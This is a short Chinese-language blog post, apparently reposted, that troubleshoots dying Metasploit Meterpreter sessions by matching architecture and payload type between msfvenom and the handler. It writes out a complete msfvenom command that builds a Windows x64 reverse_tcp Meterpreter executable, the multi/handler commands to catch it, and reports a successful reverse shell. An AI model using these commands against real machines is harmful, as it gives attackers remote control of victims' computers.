问题
🍺**用的挺好的
MSF
突然出了问题,直接裂开**
如下图,Meterpreter session
异常终止
当你试着发现问题时
只会不断增加
session值
🍺参考文章
垂死挣扎?拯救你的Meterpreter session
🍺根据自己的环境情况,判断出现的问题
我这里出现两个问题:
1
、架构混淆(
32位/64位
),在使用Metasploit时,在选择处理器体系结构时犯错误,将它们混淆在一起
🍺解决的办法是:
确保不要在msfvenom和msfconsole中
混用
了处理器体系结构,两端只能使用
32位或64位
payloads,32位、64位payloads示例:
2
、payload不匹配,我们可能在msfvenom中指定使用
windows/meterpreter/reverse_https
模块payload,而在msfconsole中,却错误地选择了
windows/meterpreter/reverse_tcp
模块payload
🍺解决方法:对payload的匹配
(1)
、生成独立的meterpreter payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555-f exe >5115.exe
(2)
、设置multi handler listener
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler)> set LHOST 192.168.0.106
msf5 exploit(multi/handler)> set LPORT 5555
msf5 exploit(multi/handler)> run
🍺了解出现的问题,重新来一次
执行exe文件的是windows64位电脑,所以选择
windows/64位
的,同时确保multi handler listener使用的payload
与
前面生成exe文件所使用的
windows/x64/meterpreter/reverse_tcp
是一样的
成功反弹
Shell
感想:回过头看看,今天确实傻里傻气的,,,,,折腾了大半天,啥跟啥啊(裂开)
版权归原作者 迷途羔羊pro 所有, 如有侵权,请联系我们删除。